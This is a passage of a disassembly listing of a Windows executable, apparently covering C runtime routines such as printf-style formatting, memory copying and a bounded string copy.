mov [ebp+1F8h+var_211], dl
loc_406D9A: ; CODE XREF: sub_4069D7+459�j
; sub_4069D7+51D�j
or [ebp+1F8h+var_210], 40h
cmp [ebp+1F8h+var_218], esi
lea ebx, [ebp+1F8h+var_20C]
mov eax, 200h
mov [ebp+1F8h+var_21C], ebx
mov [ebp+1F8h+var_260], eax
jge loc_406F7C
mov [ebp+1F8h+var_218], 6
jmp loc_406FCA
; ---------------------------------------------------------------------------
loc_406DC1: ; CODE XREF: sub_4069D7+3A8�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406E3E
or [ebp+1F8h+var_210], 800h
jmp short loc_406E3E
; ---------------------------------------------------------------------------
loc_406DD2: ; CODE XREF: sub_4069D7+39F�j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_406DE1
or [ebp+1F8h+var_210], 800h
loc_406DE1: ; CODE XREF: sub_4069D7+401�j
; sub_4069D7+694�j
mov ecx, [ebp+1F8h+var_218]
cmp ecx, 0FFFFFFFFh
jnz short loc_406DEE
mov ecx, 7FFFFFFFh
loc_406DEE: ; CODE XREF: sub_4069D7+410�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
mov [ebp+1F8h+var_21C], edi
jz loc_4071BA
cmp edi, esi
jnz short loc_406E12
mov eax, ds:off_423928
mov [ebp+1F8h+var_21C], eax
loc_406E12: ; CODE XREF: sub_4069D7+431�j
mov eax, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_23C], 1
jmp loc_4071AF
; ---------------------------------------------------------------------------
loc_406E21: ; CODE XREF: sub_4069D7+399�j
sub eax, 58h
jz loc_407063
dec eax
dec eax
jz short loc_406E8B
sub eax, ecx
jz loc_406D9A
dec eax
dec eax
jnz loc_4071DC
loc_406E3E: ; CODE XREF: sub_4069D7+3F0�j
; sub_4069D7+3F9�j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
jz short loc_406E73
movzx eax, word ptr [edi-4]
push eax
push 200h
lea eax, [ebp+1F8h+var_20C]
push eax
lea eax, [ebp+1F8h+var_220]
push eax
call sub_40D732
add esp, 10h
test eax, eax
jz short loc_406E80
mov [ebp+1F8h+var_248], 1
jmp short loc_406E80
; ---------------------------------------------------------------------------
loc_406E73: ; CODE XREF: sub_4069D7+473�j
mov al, [edi-4]
mov [ebp+1F8h+var_20C], al
mov [ebp+1F8h+var_220], 1
loc_406E80: ; CODE XREF: sub_4069D7+491�j
; sub_4069D7+49A�j
lea eax, [ebp+1F8h+var_20C]
mov [ebp+1F8h+var_21C], eax
jmp loc_4071DC
; ---------------------------------------------------------------------------
loc_406E8B: ; CODE XREF: sub_4069D7+455�j
mov eax, [edi]
add edi, 4
cmp eax, esi
mov [ebp+1F8h+var_224], edi
jz short loc_406EC5
mov ecx, [eax+4]
cmp ecx, esi
jz short loc_406EC5
test word ptr [ebp+1F8h+var_210], 800h
movsx eax, word ptr [eax]
mov [ebp+1F8h+var_21C], ecx
jz short loc_406EBD
cdq
sub eax, edx
sar eax, 1
mov [ebp+1F8h+var_23C], 1
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406EBD: ; CODE XREF: sub_4069D7+4D3�j
mov [ebp+1F8h+var_23C], esi
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406EC5: ; CODE XREF: sub_4069D7+4BE�j
; sub_4069D7+4C5�j
mov eax, ds:off_423924
mov [ebp+1F8h+var_21C], eax
push eax
loc_406ECE: ; CODE XREF: sub_4069D7+680�j
call sub_404130
pop ecx
jmp loc_4071D9
; ---------------------------------------------------------------------------
loc_406ED9: ; CODE XREF: sub_4069D7+38A�j
cmp eax, 70h
jg loc_407068
jz loc_40705C
cmp eax, 65h
jl loc_4071DC
cmp eax, 67h
jle loc_406D9A
cmp eax, 69h
jz short loc_406F58
cmp eax, 6Eh
jz short loc_406F23
cmp eax, 6Fh
jnz loc_4071DC
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 8
jz short loc_406F63
or [ebp+1F8h+var_210], 200h
jmp short loc_406F63
; ---------------------------------------------------------------------------
loc_406F23: ; CODE XREF: sub_4069D7+52B�j
mov esi, [edi]
add edi, 4
mov [ebp+1F8h+var_224], edi
call sub_40D5BD
test eax, eax
jz loc_40730D
test byte ptr [ebp+1F8h+var_210], 20h
jz short loc_406F47
mov ax, word ptr [ebp+1F8h+var_22C]
mov [esi], ax
jmp short loc_406F4C
; ---------------------------------------------------------------------------
loc_406F47: ; CODE XREF: sub_4069D7+565�j
mov eax, [ebp+1F8h+var_22C]
mov [esi], eax
loc_406F4C: ; CODE XREF: sub_4069D7+56E�j
mov [ebp+1F8h+var_248], 1
jmp loc_4072E1
; ---------------------------------------------------------------------------
loc_406F58: ; CODE XREF: sub_4069D7+390�j
; sub_4069D7+526�j
or [ebp+1F8h+var_210], 40h
loc_406F5C: ; CODE XREF: sub_4069D7+69C�j
mov [ebp+1F8h+var_220], 0Ah
loc_406F63: ; CODE XREF: sub_4069D7+541�j
; sub_4069D7+54A�j ...
mov ecx, [ebp+1F8h+var_210]
test cx, cx
jns loc_4070B2
loc_406F6F: ; CODE XREF: sub_4069D7+6E0�j
mov eax, [edi]
mov edx, [edi+4]
add edi, 8
jmp loc_4070E7
; ---------------------------------------------------------------------------
loc_406F7C: ; CODE XREF: sub_4069D7+3D8�j
jnz short loc_406F8C
cmp dl, 67h
jnz short loc_406FCA
mov [ebp+1F8h+var_218], 1
jmp short loc_406FCA
; ---------------------------------------------------------------------------
loc_406F8C: ; CODE XREF: sub_4069D7:loc_406F7C�j
cmp [ebp+1F8h+var_218], eax
jle short loc_406F94
mov [ebp+1F8h+var_218], eax
loc_406F94: ; CODE XREF: sub_4069D7+5B8�j
cmp [ebp+1F8h+var_218], 0A3h
jle short loc_406FCA
mov esi, [ebp+1F8h+var_218]
add esi, 15Dh
push esi
call sub_40773A
test eax, eax
mov dl, [ebp+1F8h+var_211]
pop ecx
mov [ebp+1F8h+var_24C], eax
jz short loc_406FC1
mov [ebp+1F8h+var_21C], eax
mov [ebp+1F8h+var_260], esi
mov ebx, eax
jmp short loc_406FC8
; ---------------------------------------------------------------------------
loc_406FC1: ; CODE XREF: sub_4069D7+5DE�j
mov [ebp+1F8h+var_218], 0A3h
loc_406FC8: ; CODE XREF: sub_4069D7+5E8�j
xor esi, esi
loc_406FCA: ; CODE XREF: sub_4069D7+3E5�j
; sub_4069D7+5AA�j ...
mov eax, [edi]
add edi, 8
mov [ebp+1F8h+var_278], eax
mov eax, [edi-4]
mov [ebp+1F8h+var_274], eax
lea eax, [ebp+1F8h+var_25C]
push eax
push [ebp+1F8h+var_270]
movsx eax, dl
push [ebp+1F8h+var_218]
mov [ebp+1F8h+var_224], edi
push eax
push [ebp+1F8h+var_260]
lea eax, [ebp+1F8h+var_278]
push ebx
push eax
push ds:off_423F98
call sub_405193
pop ecx
call eax
mov edi, [ebp+1F8h+var_210]
add esp, 1Ch
and edi, 80h
jz short loc_407027
cmp [ebp+1F8h+var_218], esi
jnz short loc_407027
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push ds:off_423FA4
call sub_405193
pop ecx
call eax
pop ecx
pop ecx
loc_407027: ; CODE XREF: sub_4069D7+634�j
; sub_4069D7+639�j
cmp [ebp+1F8h+var_211], 67h
jnz short loc_407046
cmp edi, esi
jnz short loc_407046
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push ds:off_423FA0
call sub_405193
pop ecx
call eax
pop ecx
pop ecx
loc_407046: ; CODE XREF: sub_4069D7+654�j
; sub_4069D7+658�j
cmp byte ptr [ebx], 2Dh
jnz short loc_407056
or [ebp+1F8h+var_210], 100h
inc ebx
mov [ebp+1F8h+var_21C], ebx
loc_407056: ; CODE XREF: sub_4069D7+672�j
push ebx
jmp loc_406ECE
; ---------------------------------------------------------------------------
loc_40705C: ; CODE XREF: sub_4069D7+50B�j
mov [ebp+1F8h+var_218], 8
loc_407063: ; CODE XREF: sub_4069D7+44D�j
mov [ebp+1F8h+var_244], ecx
jmp short loc_407089
; ---------------------------------------------------------------------------
loc_407068: ; CODE XREF: sub_4069D7+505�j
sub eax, 73h
jz loc_406DE1
dec eax
dec eax
jz loc_406F5C
sub eax, 3
jnz loc_4071DC
mov [ebp+1F8h+var_244], 27h
loc_407089: ; CODE XREF: sub_4069D7+68F�j
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 10h
jz loc_406F63
mov al, byte ptr [ebp+1F8h+var_244]
add al, 51h
mov [ebp+1F8h+var_230], 30h
mov [ebp+1F8h+var_22F], al
mov [ebp+1F8h+var_234], 2
jmp loc_406F63
; ---------------------------------------------------------------------------
loc_4070B2: ; CODE XREF: sub_4069D7+592�j
test cx, 1000h
jnz loc_406F6F
add edi, 4
test cl, 20h
jz short loc_4070DA
test cl, 40h
mov [ebp+1F8h+var_224], edi
jz short loc_4070D3
movsx eax, word ptr [edi-4]
jmp short loc_4070D7
; ---------------------------------------------------------------------------
loc_4070D3: ; CODE XREF: sub_4069D7+6F4�j
movzx eax, word ptr [edi-4]
loc_4070D7: ; CODE XREF: sub_4069D7+6FA�j
cdq
jmp short loc_4070EA
; ---------------------------------------------------------------------------
loc_4070DA: ; CODE XREF: sub_4069D7+6EC�j
test cl, 40h
mov eax, [edi-4]
jz short loc_4070E5
cdq
jmp short loc_4070E7
; ---------------------------------------------------------------------------
loc_4070E5: ; CODE XREF: sub_4069D7+709�j
xor edx, edx
loc_4070E7: ; CODE XREF: sub_4069D7+5A0�j
; sub_4069D7+70C�j
mov [ebp+1F8h+var_224], edi
loc_4070EA: ; CODE XREF: sub_4069D7+701�j
test cl, 40h
jz short loc_407107
cmp edx, esi
jg short loc_407107
jl short loc_4070F9
cmp eax, esi
jnb short loc_407107
loc_4070F9: ; CODE XREF: sub_4069D7+71C�j
neg eax
adc edx, 0
neg edx
or [ebp+1F8h+var_210], 100h
loc_407107: ; CODE XREF: sub_4069D7+716�j
; sub_4069D7+71A�j ...
test word ptr [ebp+1F8h+var_210], 9000h
mov ebx, edx
mov edi, eax
jnz short loc_407115
xor ebx, ebx
loc_407115: ; CODE XREF: sub_4069D7+73A�j
cmp [ebp+1F8h+var_218], 0
jge short loc_407124
mov [ebp+1F8h+var_218], 1
jmp short loc_407135
; ---------------------------------------------------------------------------
loc_407124: ; CODE XREF: sub_4069D7+742�j
and [ebp+1F8h+var_210], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+1F8h+var_218], eax
jle short loc_407135
mov [ebp+1F8h+var_218], eax
loc_407135: ; CODE XREF: sub_4069D7+74B�j
; sub_4069D7+759�j
mov eax, edi
or eax, ebx
jnz short loc_40713F
and [ebp+1F8h+var_234], 0
loc_40713F: ; CODE XREF: sub_4069D7+762�j
lea esi, [ebp+1F8h+var_D]
loc_407145: ; CODE XREF: sub_4069D7+7A0�j
mov eax, [ebp+1F8h+var_218]
dec [ebp+1F8h+var_218]
test eax, eax
jg short loc_407155
mov eax, edi
or eax, ebx
jz short loc_407179
loc_407155: ; CODE XREF: sub_4069D7+776�j
mov eax, [ebp+1F8h+var_220]
cdq
push edx
push eax
push ebx
push edi
call sub_40D750
add ecx, 30h
cmp ecx, 39h
mov [ebp+1F8h+var_260], ebx
mov edi, eax
mov ebx, edx
jle short loc_407174
add ecx, [ebp+1F8h+var_244]
loc_407174: ; CODE XREF: sub_4069D7+798�j
mov [esi], cl
dec esi
jmp short loc_407145
; ---------------------------------------------------------------------------
loc_407179: ; CODE XREF: sub_4069D7+77C�j
lea eax, [ebp+1F8h+var_D]
sub eax, esi
inc esi
test word ptr [ebp+1F8h+var_210], 200h
mov [ebp+1F8h+var_220], eax
mov [ebp+1F8h+var_21C], esi
jz short loc_4071DC
test eax, eax
jz short loc_40719B
mov ecx, esi
cmp byte ptr [ecx], 30h
jz short loc_4071DC
loc_40719B: ; CODE XREF: sub_4069D7+7BB�j
dec [ebp+1F8h+var_21C]
mov ecx, [ebp+1F8h+var_21C]
mov byte ptr [ecx], 30h
inc eax
jmp short loc_4071D9
; ---------------------------------------------------------------------------
loc_4071A7: ; CODE XREF: sub_4069D7+7DA�j
dec ecx
cmp [eax], si
jz short loc_4071B3
inc eax
inc eax
loc_4071AF: ; CODE XREF: sub_4069D7+445�j
cmp ecx, esi
jnz short loc_4071A7
loc_4071B3: ; CODE XREF: sub_4069D7+7D4�j
sub eax, [ebp+1F8h+var_21C]
sar eax, 1
jmp short loc_4071D9
; ---------------------------------------------------------------------------
loc_4071BA: ; CODE XREF: sub_4069D7+429�j
cmp edi, esi
jnz short loc_4071C6
mov eax, ds:off_423924
mov [ebp+1F8h+var_21C], eax
loc_4071C6: ; CODE XREF: sub_4069D7+7E5�j
mov eax, [ebp+1F8h+var_21C]
jmp short loc_4071D2
; ---------------------------------------------------------------------------
loc_4071CB: ; CODE XREF: sub_4069D7+7FD�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_4071D6
inc eax
loc_4071D2: ; CODE XREF: sub_4069D7+7F2�j
cmp ecx, esi
jnz short loc_4071CB
loc_4071D6: ; CODE XREF: sub_4069D7+7F8�j
sub eax, [ebp+1F8h+var_21C]
loc_4071D9: ; CODE XREF: sub_4069D7+4E1�j
; sub_4069D7+4E9�j ...
mov [ebp+1F8h+var_220], eax
loc_4071DC: ; CODE XREF: sub_4069D7+3B0�j
; sub_4069D7+461�j ...
cmp [ebp+1F8h+var_248], 0
jnz loc_4072E1
mov eax, [ebp+1F8h+var_210]
test al, 40h
jz short loc_407212
test ax, 100h
jz short loc_4071F9
mov [ebp+1F8h+var_230], 2Dh
jmp short loc_40720B
; ---------------------------------------------------------------------------
loc_4071F9: ; CODE XREF: sub_4069D7+81A�j
test al, 1
jz short loc_407203
mov [ebp+1F8h+var_230], 2Bh
jmp short loc_40720B
; ---------------------------------------------------------------------------
loc_407203: ; CODE XREF: sub_4069D7+824�j
test al, 2
jz short loc_407212
mov [ebp+1F8h+var_230], 20h
loc_40720B: ; CODE XREF: sub_4069D7+820�j
; sub_4069D7+82A�j
mov [ebp+1F8h+var_234], 1
loc_407212: ; CODE XREF: sub_4069D7+814�j
; sub_4069D7+82E�j
mov ebx, [ebp+1F8h+var_238]
sub ebx, [ebp+1F8h+var_220]
sub ebx, [ebp+1F8h+var_234]
test byte ptr [ebp+1F8h+var_210], 0Ch
jnz short loc_407232
push [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
push ebx
push 20h
call sub_406969
add esp, 0Ch
loc_407232: ; CODE XREF: sub_4069D7+848�j
push [ebp+1F8h+var_234]
mov edi, [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_230]
call sub_40698D
test byte ptr [ebp+1F8h+var_210], 8
pop ecx
jz short loc_40725F
test byte ptr [ebp+1F8h+var_210], 4
jnz short loc_40725F
push edi
push ebx
push 30h
lea eax, [ebp+1F8h+var_22C]
call sub_406969
add esp, 0Ch
loc_40725F: ; CODE XREF: sub_4069D7+871�j
; sub_4069D7+877�j
cmp [ebp+1F8h+var_23C], 0
mov eax, [ebp+1F8h+var_220]
jz short loc_4072B9
test eax, eax
jle short loc_4072B9
mov esi, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_260], eax
loc_407272: ; CODE XREF: sub_4069D7+8D8�j
movzx eax, word ptr [esi]
dec [ebp+1F8h+var_260]
push eax
push 6
lea eax, [ebp+1F8h+var_C]
push eax
lea eax, [ebp+1F8h+var_268]
inc esi
push eax
inc esi
call sub_40D732
add esp, 10h
test eax, eax
jnz short loc_4072B3
cmp [ebp+1F8h+var_268], eax
jz short loc_4072B3
push [ebp+1F8h+var_268]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_C]
call sub_40698D
cmp [ebp+1F8h+var_260], 0
pop ecx
jnz short loc_407272
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072B3: ; CODE XREF: sub_4069D7+8BB�j
; sub_4069D7+8C0�j
or [ebp+1F8h+var_22C], 0FFFFFFFFh
jmp short loc_4072C6
; ---------------------------------------------------------------------------
loc_4072B9: ; CODE XREF: sub_4069D7+88F�j
; sub_4069D7+893�j
mov ecx, [ebp+1F8h+var_21C]
push eax
lea eax, [ebp+1F8h+var_22C]
call sub_40698D
pop ecx
loc_4072C6: ; CODE XREF: sub_4069D7+8DA�j
; sub_4069D7+8E0�j
cmp [ebp+1F8h+var_22C], 0
jl short loc_4072E1
test byte ptr [ebp+1F8h+var_210], 4
jz short loc_4072E1
push edi
push ebx
push 20h
lea eax, [ebp+1F8h+var_22C]
call sub_406969
add esp, 0Ch
loc_4072E1: ; CODE XREF: sub_4069D7+57C�j
; sub_4069D7+809�j ...
cmp [ebp+1F8h+var_24C], 0
jz short loc_4072F4 ; default
push [ebp+1F8h+var_24C]
call sub_403603
and [ebp+1F8h+var_24C], 0
pop ecx
loc_4072F4: ; CODE XREF: sub_4069D7+19C�j
; sub_4069D7+1BF�j ...
mov ebx, [ebp+1F8h+var_240] ; default
mov al, [ebx]
test al, al
mov [ebp+1F8h+var_211], al
jz short loc_407324
mov ecx, [ebp+1F8h+var_26C]
mov edi, [ebp+1F8h+var_224]
mov dl, al
jmp loc_406B35
; ---------------------------------------------------------------------------
loc_40730D: ; CODE XREF: sub_4069D7+36E�j
; sub_4069D7+55B�j
call sub_4057D3
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp loc_406A47
; ---------------------------------------------------------------------------
loc_407324: ; CODE XREF: sub_4069D7+158�j
; sub_4069D7+166�j ...
cmp [ebp+1F8h+var_250], 0
jz short loc_407331
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_407331: ; CODE XREF: sub_4069D7+951�j
mov eax, [ebp+1F8h+var_22C]
loc_407334: ; CODE XREF: sub_4069D7+88�j
mov ecx, [ebp+1F8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1F8h
leave
retn
sub_4069D7 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_40734F dd offset loc_406D19 ; DATA XREF: sub_4069D7+1A2�r
dd offset loc_406B80 ; jump table for switch statement
dd offset loc_406B9B
dd offset loc_406BEA
dd offset loc_406C24
dd offset loc_406C2C
dd offset loc_406C63
dd offset loc_406D5B
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407370 proc near ; CODE XREF: sub_402BA0+4D�p
; sub_405B50+2DA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407390
cmp edi, eax
jb loc_407534
loc_407390: ; CODE XREF: sub_407370+16�j
cmp ecx, 100h
jb short loc_4073B7
cmp ds:dword_433C7C, 0
jz short loc_4073B7
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_4073B7
pop esi
pop edi
pop ebp
jmp sub_40D86C
; ---------------------------------------------------------------------------
loc_4073B7: ; CODE XREF: sub_407370+26�j
; sub_407370+2F�j ...
test edi, 3
jnz short loc_4073D4
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4073D4: ; CODE XREF: sub_407370+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4073EC
and eax, 3
add ecx, eax
jmp dword ptr loc_4073F4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4073EC: ; CODE XREF: sub_407370+6E�j
jmp dword ptr loc_4074F4[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4073F4: ; CODE XREF: sub_407370+58�j
; sub_407370+B6�j ...
jmp off_407478[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407408
dd offset loc_407434
dd offset loc_407458
; ---------------------------------------------------------------------------
loc_407408: ; DATA XREF: sub_407370+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407434: ; DATA XREF: sub_407370+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_407458: ; DATA XREF: sub_407370+94�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_4073F4
rep movsd
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_407478 dd offset loc_4074DB ; DATA XREF: sub_407370:loc_4073F4�r
dd offset loc_4074C8
dd offset loc_4074C0
dd offset loc_4074B8
dd offset loc_4074B0
dd offset loc_4074A8
dd offset loc_4074A0
dd offset loc_407498
; ---------------------------------------------------------------------------
loc_407498: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4074A0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4074A8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4074B0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4074B8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4074C0: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4074C8: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4074DB: ; CODE XREF: sub_407370:loc_4073F4�j
; DATA XREF: sub_407370:off_407478�o
jmp off_4074E4[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4074E4 dd offset loc_4074F4 ; DATA XREF: sub_407370+5C�r
; sub_407370+BA�r ...
dd offset loc_4074FC
dd offset loc_407508
dd offset loc_40751C
; ---------------------------------------------------------------------------
loc_4074F4: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4074FC: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407508: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40751C: ; CODE XREF: sub_407370+5C�j
; sub_407370+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407534: ; CODE XREF: sub_407370+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_407568
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40755C: ; CODE XREF: sub_407370+1DD�j
; sub_407370+238�j ...
neg ecx
jmp off_407630[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_407568: ; CODE XREF: sub_407370+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_407580
and eax, 3
sub ecx, eax
jmp dword ptr loc_407580+4[eax*4]
; ---------------------------------------------------------------------------
loc_407580: ; CODE XREF: sub_407370+202�j
; DATA XREF: sub_407370+209�r
jmp off_407680[ecx*4]
; ---------------------------------------------------------------------------
align 4
xchg eax, esp
jnz short loc_4075CB
add [eax-1FFFBF8Bh], bh
jnz short near ptr loc_4075D1+2
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
dd 2303468Ah, 34788D1h, 0C102468Ah, 478802E9h
db 2, 83h, 0EEh
; ---------------------------------------------------------------------------
loc_4075CB: ; CODE XREF: sub_407370+219�j
add al, [ebx-67CFD11h]
loc_4075D1: ; CODE XREF: sub_407370+221�j
or [edx-78h], dh
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40755C
std
rep movsd
cld
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_407634
dd offset loc_40763C
dd offset loc_407644
dd offset loc_40764C
dd offset loc_407654
dd offset loc_40765C
dd offset loc_407664
off_407630 dd offset loc_407677 ; DATA XREF: sub_407370+1EE�r
; ---------------------------------------------------------------------------
loc_407634: ; DATA XREF: sub_407370+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40763C: ; DATA XREF: sub_407370+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_407644: ; DATA XREF: sub_407370+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40764C: ; DATA XREF: sub_407370+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_407654: ; DATA XREF: sub_407370+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40765C: ; DATA XREF: sub_407370+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_407664: ; DATA XREF: sub_407370+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_407677: ; CODE XREF: sub_407370+1EE�j
; DATA XREF: sub_407370:off_407630�o
jmp off_407680[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_407680 dd offset loc_407690 ; DATA XREF: sub_407370+1E3�r
; sub_407370:loc_407580�r ...
dd offset loc_407698
dd offset loc_4076A8
dd offset loc_4076BC
; ---------------------------------------------------------------------------
loc_407690: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_407698: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4076A8: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4076BC: ; CODE XREF: sub_407370+1E3�j
; sub_407370:loc_407580�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407370 endp
; =============== S U B R O U T I N E =======================================
sub_4076D5 proc near ; CODE XREF: sub_402C0C+31�p
; sub_402C72+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jz short loc_4076EA
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_407705
loc_4076EA: ; CODE XREF: sub_4076D5+B�j
; sub_4076D5+3A�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_4076F4: ; CODE XREF: sub_4076D5+5D�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_407736
; ---------------------------------------------------------------------------
loc_407705: ; CODE XREF: sub_4076D5+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_407711
mov [ecx], bl
jmp short loc_4076EA
; ---------------------------------------------------------------------------
loc_407711: ; CODE XREF: sub_4076D5+36�j
mov edx, ecx
loc_407713: ; CODE XREF: sub_4076D5+49�j
mov al, [esi]
mov [edx], al
inc edx
inc esi
cmp al, bl
jz short loc_407720
dec edi
